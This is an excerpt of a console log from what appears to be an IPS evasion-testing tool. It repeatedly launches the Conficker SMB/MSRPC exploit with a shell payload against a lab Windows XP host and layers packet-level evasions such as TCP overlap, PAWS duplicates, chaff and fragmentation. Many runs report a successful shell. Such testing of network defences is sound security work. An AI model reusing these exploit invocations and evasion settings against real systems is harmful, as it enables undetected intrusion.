  388. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48251 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=FadBcaLVpzM --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"1478","new","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
  389. Info: Using random seed FadBcaLVpzM
  390. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  391. - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  392. - Add a zero urgent data byte to every 1 TCP segment.
  393.  
  394. Info: NetBIOS connection 10.62.90.119:48251 -> 10.35.1.207:445
  395. Terminated
  396. ..
  397. 692 runs averaging 2.28 runs / second ; progress: 303/43200......
  398. 698 runs averaging 2.27 runs / second ; progress: 308/43200.......
  399. 705 runs averaging 2.25 runs / second ; progress: 313/43200....2015-06-07 23:24:47 INFO
  400. Success. (10.62.90.119):
  401. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60901 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=5rcJEIzKfQ8 --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,msrpc_bind]tcp_overlap,"10","new","random_alphanum" --evasion=[start,msrpc_req]tcp_paws,"50%","4","random_alphanum" --verifydelay=1000 --payload=shell
  402. Info: Using random seed 5rcJEIzKfQ/
  403. The following evasions are applied from stage start to msrpc_req:
  404. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alphanumeric bytes as payload
  405. The following evasions are applied from stage smb_connect to msrpc_bind:
  406. - TCP segments are set to overlap by 10 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  407. The following evasions are applied from stage smb_opentree to smb_openpipe:
  408. - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  409.  
  410. Info: NetBIOS connection 10.62.90.119:60901 -> 10.35.1.207:445
  411. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  412. Info: Sending MSRPC request with exploit
  413. Info: Shell found, attack succeeded
  414. Info: Command shell connection reset.
  415. Info: CommandShell::SendCommand() - Failed to send string
  416. Info: Shell closed
  417. 0: Success.
  418. Pid 28126 timed out - killed
  419. 2015-06-07 23:24:47 INFO
  420. Timed out (10.62.90.111):
  421. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14218 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=UylDA10TeNQ --evasion=[netbios_connect,smb_opentree]ipv4_frag,"904" --evasion=[smb_connect,msrpc_req]smb_chaff,"5","write_flag","msrpc" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
  422. Info: Using random seed UylDA10TeNR
  423. The following evasions are applied from stage netbios_connect to smb_opentree:
  424. - IPv4 fragments with at most 904 bytes per fragment
  425. The following evasions are applied from stage smb_connect to msrpc_req:
  426. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  427. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  428. - 75% probability to add a random alphaurgent data byte to a TCP segment.
  429.  
  430. Info: NetBIOS connection 10.62.90.111:14218 -> 10.35.1.207:445
  431. Terminated
  432. ....
  433. 715 runs averaging 2.25 runs / second ; progress: 318/43200........2015-06-07 23:24:51 INFO
  434. Success. (10.62.90.112):
  435. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13004 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=2GjOOsvsIIQ --evasion=[smb_openpipe,end]smb_writeandxpad,"2","random" --evasion=[msrpc_bind,end]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
  436. Info: Using random seed 2GjOOsvsIIT
  437. The following evasions are applied from stage smb_openpipe to end:
  438. - 2 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  439. The following evasions are applied from stage msrpc_bind to end:
  440. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  441.  
  442. Info: NetBIOS connection 10.62.90.112:13004 -> 10.35.1.207:445
  443. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  444. Info: Sending MSRPC request with exploit
  445. Info: Shell found, attack succeeded
  446. Info: Shell closed
  447. 0: Success.
  448. ...
  449. 727 runs averaging 2.25 runs / second ; progress: 323/43200.....Pid 28669 timed out - killed
  450. 2015-06-07 23:24:57 INFO
  451. Timed out (10.62.90.115):
  452. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12771 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=kfbuWD4P89g --evasion=[netbios_connect,msrpc_req]ipv4_frag,"80" --evasion=[smb_opentree,msrpc_req]tcp_paws,"2","3","alpharandomized" --evasion=[msrpc_req,end]tcp_paws,"2","176664122","alphanumrandomized" --verifydelay=1000 --payload=shell
  453. Info: Using random seed kfbuWD4P89i
  454. The following evasions are applied from stage netbios_connect to msrpc_req:
  455. - IPv4 fragments with at most 80 bytes per fragment
  456. The following evasions are applied from stage smb_opentree to msrpc_req:
  457. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
  458. The following evasions are applied from stage msrpc_req to end:
  459. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 176664122> and has original payload with alphanumeric bytes randomized
  460.  
  461. Info: NetBIOS connection 10.62.90.115:12771 -> 10.35.1.207:445
  462. Terminated
  463. ..
  464. 735 runs averaging 2.24 runs / second ; progress: 328/43200.......
  465. 742 runs averaging 2.23 runs / second ; progress: 333/43200....Pid 29029 timed out - killed
  466. 2015-06-07 23:25:05 INFO
  467. Timed out (10.62.90.114):
  468. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28770 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=XiG22AlNIMY --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
  469. Info: Using random seed XiG22AlNIMZ
  470. The following evasions are applied from stage smb_connect to msrpc_bind:
  471. - TCP timestamps echo reply value is sent in the wrong endianness
  472. The following evasions are applied from stage smb_opentree to msrpc_req:
  473. - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
  474.  
  475. Info: NetBIOS connection 10.62.90.114:28770 -> 10.35.1.207:445
  476. Terminated
  477. .........
  478. 756 runs averaging 2.24 runs / second ; progress: 338/43200..............
  479. 770 runs averaging 2.24 runs / second ; progress: 343/43200..............
  480. 784 runs averaging 2.25 runs / second ; progress: 348/43200............
  481. 796 runs averaging 2.25 runs / second ; progress: 353/43200........
  482. 804 runs averaging 2.24 runs / second ; progress: 358/43200......
  483. 810 runs averaging 2.23 runs / second ; progress: 363/432002015-06-07 23:25:34 INFO
  484. Success. (10.62.90.118):
  485. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47572 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=0nVUQix4y/E --evasion=[smb_opentree,end]tcp_chaff,"2","nullchksum|nullflag|shorthdr","unmodified" --evasion=[netbios_connect,end]tcp_paws,"50%","8","alpharandomized" --verifydelay=1000 --payload=shell
  486. Info: Using random seed 0nVUQix4y/H
  487. The following evasions are applied from stage netbios_connect to end:
  488. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
  489. The following evasions are applied from stage smb_opentree to end:
  490.  
  491.  
  492. Info: NetBIOS connection 10.62.90.118:47572 -> 10.35.1.207:445
  493. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  494. Info: Sending MSRPC request with exploit
  495. Info: Shell found, attack succeeded
  496. Info: Shell closed
  497. 0: Success.
  498. ..
  499. 813 runs averaging 2.21 runs / second ; progress: 368/43200......
  500. 819 runs averaging 2.19 runs / second ; progress: 373/43200Pid 30108 timed out - killed
  501. 2015-06-07 23:25:43 INFO
  502. Timed out (10.62.90.116):
  503. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63115 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=C7Gx0UPKlVk --evasion=[smb_opentree,msrpc_req]tcp_chaff,"8","nullchksum|nullflag|outofwindow","random_alpha" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  504. Info: Using random seed C7Gx0UPKlVk
  505. The following evasions are applied from stage smb_opentree to msrpc_req:
  506. - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
  507. * NULL TCP checksum.
  508. * NULL TCP control flags.
  509. * An out-of-window sequence number.
  510. * Duplicate packet has random alpha bytes as payload
  511. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  512. - 75% probability to add a random urgent data byte to a TCP segment.
  513.  
  514. Info: NetBIOS connection 10.62.90.116:63115 -> 10.35.1.207:445
  515. Terminated
  516. ..Pid 30138 timed out - killed
  517. 2015-06-07 23:25:45 INFO
  518. Timed out (10.62.90.110):
  519. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15702 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=M+TbVWpf7Lc --evasion=[msrpc_bind,end]tcp_paws,"50%","4","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
  520. Info: Using random seed M+TbVWpf7Lc
  521. The following evasions are applied from stage smb_openpipe to end:
  522. - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
  523. The following evasions are applied from stage msrpc_bind to end:
  524. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has 0x00 bytes as payload
  525.  
  526. Info: NetBIOS connection 10.62.90.110:15702 -> 10.35.1.207:445
  527. Terminated
  528. ...........
  529. 834 runs averaging 2.20 runs / second ; progress: 379/43200...........
  530. 845 runs averaging 2.20 runs / second ; progress: 384/43200......
  531. 851 runs averaging 2.19 runs / second ; progress: 389/43200.
  532. 852 runs averaging 2.16 runs / second ; progress: 394/43200.......
  533. 859 runs averaging 2.16 runs / second ; progress: 399/43200..............
  534. 873 runs averaging 2.16 runs / second ; progress: 404/43200......
  535. 879 runs averaging 2.15 runs / second ; progress: 409/43200
  536. 879 runs averaging 2.12 runs / second ; progress: 414/43200.....
  537. 884 runs averaging 2.11 runs / second ; progress: 419/43200.............
  538. 897 runs averaging 2.12 runs / second ; progress: 424/43200.....2015-06-07 23:26:37 INFO
  539. Success. (10.62.90.112):
  540. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56392 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=jxeAP58CYIU --evasion=[start,end]ipv4_opt,"2","inc","zero" --evasion=[netbios_connect,end]tcp_paws,"2","268435455","random_alpha" --evasion=[msrpc_bind,end]tcp_seg,"5" --verifydelay=1000 --payload=shell
  541. Info: Using random seed jxeAP58CYIW
  542. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  543. The duplicate packet has NULL bytes for payload
  544. The following evasions are applied from stage netbios_connect to end:
  545. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  546. The following evasions are applied from stage msrpc_bind to end:
  547. - TCP packets are segmented to contain at most 5 bytes of payload.
  548.  
  549. Info: NetBIOS connection 10.62.90.112:56392 -> 10.35.1.207:445
  550. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  551. Info: Sending MSRPC request with exploit
  552. Info: Shell found, attack succeeded
  553. Info: CommandShell::SendCommand() - Failed to send string
  554. Info: Command shell connection reset.
  555. Info: Shell closed
  556. 0: Success.
  557. ..
  558. 905 runs averaging 2.11 runs / second ; progress: 429/43200.......2015-06-07 23:26:43 INFO
  559. Success. (10.62.90.110):
  560. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31587 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5heyJRsjnD8 --evasion=[start,smb_openpipe]tcp_chaff,"3","nullchksum|nullflag|outofwindow|longhdr","random_alphanum" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"75%","268435455","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435454","alpharandomized" --verifydelay=1000 --payload=shell
  561. Info: Using random seed 5heyJRsjnD/
  562. The following evasions are applied from stage start to smb_openpipe:
  563. - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
  564. * NULL TCP checksum.
  565. * NULL TCP control flags.
  566. * An out-of-window sequence number.
  567. * TCP header longer than packet total size
  568. * Duplicate packet has random alphanumeric bytes as payload
  569. The following evasions are applied from stage smb_opentree to smb_openpipe:
  570. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphanumeric bytes randomized
  571. The following evasions are applied from stage smb_openpipe to msrpc_req:
  572. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
  573.  
  574. Info: NetBIOS connection 10.62.90.110:31587 -> 10.35.1.207:445
  575. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  576. Info: Sending MSRPC request with exploit
  577. Info: Shell found, attack succeeded
  578. Info: Command shell connection reset.
  579. Info: CommandShell::SendCommand() - Failed to send string
  580. Info: Shell closed
  581. 0: Success.
  582. .
  583. 914 runs averaging 2.11 runs / second ; progress: 434/43200....2015-06-07 23:26:46 INFO
  584. Success. (10.62.90.118):
  585. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22932 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ZNjKCYBz1U8 --evasion=[smb_connect,smb_opentree]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"7","6","7","random_msrpcbind" --verifydelay=1000 --payload=shell
  586. Info: Using random seed ZNjKCYBz1U9
  587. The following evasions are applied from stage smb_connect to smb_opentree:
  588. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  589. The duplicate packet has identical payload except that alphabetic characters are randomized
  590. The following evasions are applied from stage smb_openpipe to msrpc_req:
  591. - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
  592.  
  593. Info: NetBIOS connection 10.62.90.118:22932 -> 10.35.1.207:445
  594. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  595. Info: Sending MSRPC request with exploit
  596. Info: Shell found, attack succeeded
  597. Info: Shell closed
  598. 0: Success.
  599. ....
  600. 923 runs averaging 2.10 runs / second ; progress: 439/43200...
  601. 926 runs averaging 2.09 runs / second ; progress: 444/43200.....
  602. 931 runs averaging 2.07 runs / second ; progress: 449/43200.....
  603. 936 runs averaging 2.06 runs / second ; progress: 454/43200.......
  604. 943 runs averaging 2.06 runs / second ; progress: 459/43200...........
  605. 954 runs averaging 2.06 runs / second ; progress: 464/432002015-06-07 23:27:14 INFO
  606. Success. (10.62.90.116):
  607. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45379 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PKDFLu3szoA --evasion=[smb_connect,smb_openpipe]smb_decoytrees,"5","1","7","random" --evasion=[msrpc_bind,end]tcp_paws,"75%","236472573","alphanumrandomized" --verifydelay=1000 --payload=shell
  608. Info: Using random seed PKDFLu3szoA
  609. The following evasions are applied from stage smb_connect to smb_openpipe:
  610. - Before normal SMB writes, 5 SMB trees are opened and 1 writes are performed to them. The write payload is 7 random bytes.
  611. The following evasions are applied from stage msrpc_bind to end:
  612. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 236472573> and has original payload with alphanumeric bytes randomized
  613.  
  614. Info: NetBIOS connection 10.62.90.116:45379 -> 10.35.1.207:445
  615. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  616. Info: Sending MSRPC request with exploit
  617. Info: Shell found, attack succeeded
  618. Info: CommandShell::SendCommand() - Failed to send string
  619. Info: Command shell connection reset.
  620. Info: Shell closed
  621. 0: Success.
  622. .......
  623. 962 runs averaging 2.05 runs / second ; progress: 469/43200........
  624. 970 runs averaging 2.05 runs / second ; progress: 474/43200..
  625. 972 runs averaging 2.03 runs / second ; progress: 479/43200......2015-06-07 23:27:31 INFO
  626. Success. (10.62.90.112):
  627. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18684 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=FSkveGjBNE0 --evasion=[smb_connect,smb_opentree]netbios_chaff,"75%","empty_unspec|empty_keepalive|small_unspec|http_post|msrpc_req|broken_length" --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","4","8","random_msrpcbind" --verifydelay=1000 --payload=shell
  628. Info: Using random seed FSkveGjBNE0
  629. The following evasions are applied from stage smb_connect to smb_opentree:
  630. - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  631. The following evasions are applied from stage msrpc_bind to msrpc_req:
  632. - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  633.  
  634. Info: NetBIOS connection 10.62.90.112:18684 -> 10.35.1.207:445
  635. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  636. Info: Sending MSRPC request with exploit
  637. Info: Shell found, attack succeeded
  638. Info: CommandShell::SendCommand() - Failed to send string
  639. Info: Command shell connection reset.
  640. Info: Shell closed
  641. 0: Success.
  642. ....
  643. 983 runs averaging 2.03 runs / second ; progress: 484/43200.................
  644. 1000 runs averaging 2.05 runs / second ; progress: 489/43200........
  645. 1008 runs averaging 2.04 runs / second ; progress: 494/43200...........
  646. 1019 runs averaging 2.04 runs / second ; progress: 499/43200.........
  647. 1028 runs averaging 2.04 runs / second ; progress: 504/43200Pid 32180 timed out - killed
  648. 2015-06-07 23:27:54 INFO
  649. Timed out (10.62.90.117):
  650. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30975 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LxaXqpswT/A --evasion=[start,end]tcp_inittsopt,"disable","zero" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  651. Info: Using random seed LxaXqpswT/A
  652. - TCP timestamps are disabled.
  653. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  654. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  655.  
  656. Info: NetBIOS connection 10.62.90.117:30975 -> 10.35.1.207:445
  657. Terminated
  658. ..........2015-06-07 23:27:57 INFO
  659. Success. (10.62.90.117):
  660. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63794 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=FUtkY7DTvvk --evasion=[smb_connect,msrpc_req]ipv4_opt,"75%","inc","zero" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","248964565","shuffle" --verifydelay=1000 --payload=shell
  661. Info: Using random seed FUtkY7DTvvk
  662. The following evasions are applied from stage netbios_connect to msrpc_req:
  663. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248964565> and has shuffled original payload
  664. The following evasions are applied from stage smb_connect to msrpc_req:
  665. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  666. The duplicate packet has NULL bytes for payload
  667.  
  668. Info: NetBIOS connection 10.62.90.117:63794 -> 10.35.1.207:445
  669. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  670. Info: Sending MSRPC request with exploit
  671. Info: Shell found, attack succeeded
  672. Info: CommandShell::SendCommand() - Failed to send string
  673. Info: Command shell connection reset.
  674. Info: Shell closed
  675. 0: Success.
  676. .....
  677. 1045 runs averaging 2.05 runs / second ; progress: 509/43200.........2015-06-07 23:28:03 INFO
  678. Success. (10.62.90.117):
  679. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11579 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=T9gQkNxSf1A --evasion=[smb_openpipe,msrpc_req]tcp_paws,"50%","210110311","alphanumrandomized" --evasion=[netbios_connect,smb_connect]tcp_seg,"8" --verifydelay=1000 --payload=shell
  680. Info: Using random seed T9gQkNxSf1B
  681. The following evasions are applied from stage netbios_connect to smb_connect:
  682. - TCP packets are segmented to contain at most 8 bytes of payload.
  683. The following evasions are applied from stage smb_openpipe to msrpc_req:
  684. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 210110311> and has original payload with alphanumeric bytes randomized
  685.  
  686. Info: NetBIOS connection 10.62.90.117:11579 -> 10.35.1.207:445
  687. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  688. Info: Sending MSRPC request with exploit
  689. Info: Shell found, attack succeeded
  690. Info: CommandShell::SendCommand() - Failed to send string
  691. Info: Command shell connection reset.
  692. Info: Shell closed
  693. 0: Success.
  694. .
  695. 1056 runs averaging 2.05 runs / second ; progress: 514/43200.....
  696. 1061 runs averaging 2.04 runs / second ; progress: 519/43200...2015-06-07 23:28:13 INFO
  697. Success. (10.62.90.117):
  698. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14967 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=pKBgcpQw7jU --evasion=[start,msrpc_req]tcp_paws,"3","4","random_alpha" --evasion=[netbios_connect,end]tcp_timewait,"9","random_alphanum" --verifydelay=1000 --payload=shell
  699. Info: Using random seed pKBgcpQw7jW
  700. The following evasions are applied from stage start to msrpc_req:
  701. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random alpha bytes as payload
  702. The following evasions are applied from stage netbios_connect to end:
  703. - 9 decoy TCP connections are opened from the same TCP port as the exploit connection will use. Each connection will be 32-544 bytes long and has random alphanumeric bytes as payload
  704.  
  705. Info: NetBIOS connection 10.62.90.117:14967 -> 10.35.1.207:445
  706. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  707. Info: Sending MSRPC request with exploit
  708. Info: Shell found, attack succeeded
  709. Info: Shell closed
  710. 0: Success.
  711.  
  712. 1065 runs averaging 2.03 runs / second ; progress: 524/43200...........
  713. 1076 runs averaging 2.03 runs / second ; progress: 529/43200...........
  714. 1087 runs averaging 2.04 runs / second ; progress: 534/43200.....
  715. 1092 runs averaging 2.03 runs / second ; progress: 539/43200...Pid 374 timed out - killed
  716. 2015-06-07 23:28:32 INFO
  717. Timed out (10.62.90.113):
  718. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57743 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nx9xO19TZJk --evasion=[smb_connect,smb_opentree]ipv4_opt,"5","inc","random_alphanum" --evasion=[smb_connect,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  719. Info: Using random seed nx9xO19TZJm
  720. The following evasions are applied from stage smb_connect to smb_opentree:
  721. - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  722. The duplicate packet has random alphanumeric bytes as payload
  723. The following evasions are applied from stage smb_connect to end:
  724. - 25% probability to add a zero urgent data byte to a TCP segment.
  725.  
  726. Info: NetBIOS connection 10.62.90.113:57743 -> 10.35.1.207:445
  727. Terminated
  728. .....
  729. 1101 runs averaging 2.02 runs / second ; progress: 544/43200...........2015-06-07 23:28:38 INFO
  730. Success. (10.62.90.113):
  731. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29873 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=1DXgDuqehjs --evasion=[smb_opentree,smb_openpipe]smb_writeandxpad,"1023","random_alphanum" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","6","alphanumrandomized" --verifydelay=1000 --payload=shell
  732. Info: Using random seed 1DXgDuqehjv
  733. The following evasions are applied from stage smb_opentree to smb_openpipe:
  734. - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  735. The following evasions are applied from stage smb_openpipe to msrpc_req:
  736. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
  737.  
  738. Info: NetBIOS connection 10.62.90.113:29873 -> 10.35.1.207:445
  739. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  740. Info: Sending MSRPC request with exploit
  741. Info: Shell found, attack succeeded
  742. Info: Shell closed
  743. 0: Success.
  744. ...
  745. 1116 runs averaging 2.03 runs / second ; progress: 549/43200...........
  746. 1127 runs averaging 2.03 runs / second ; progress: 554/43200...
  747. 1130 runs averaging 2.02 runs / second ; progress: 559/43200........
  748. 1138 runs averaging 2.02 runs / second ; progress: 564/43200......
  749. 1144 runs averaging 2.01 runs / second ; progress: 569/43200......
  750. 1150 runs averaging 2.00 runs / second ; progress: 574/43200....
  751. 1154 runs averaging 1.99 runs / second ; progress: 579/43200..........
  752. 1164 runs averaging 1.99 runs / second ; progress: 584/43200.....
  753. 1169 runs averaging 1.98 runs / second ; progress: 589/43200
  754. 1169 runs averaging 1.97 runs / second ; progress: 594/43200
  755. 1169 runs averaging 1.95 runs / second ; progress: 599/43200.....
  756. 1174 runs averaging 1.94 runs / second ; progress: 604/43200..2015-06-07 23:29:35 INFO
  757. Success. (10.62.90.112):
  758. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49313 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4tABlTwo17Y --evasion=[smb_openpipe,msrpc_bind]smb_writeandxpad,"9","random" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"5","new","zero" --evasion=[start,end]tcp_paws,"1","6","alpharandomized" --verifydelay=1000 --payload=shell
  759. Info: Using random seed 4tABlTwo17b
  760. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
  761. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  762. - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
  763. - 9 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random bytes.
  764.  
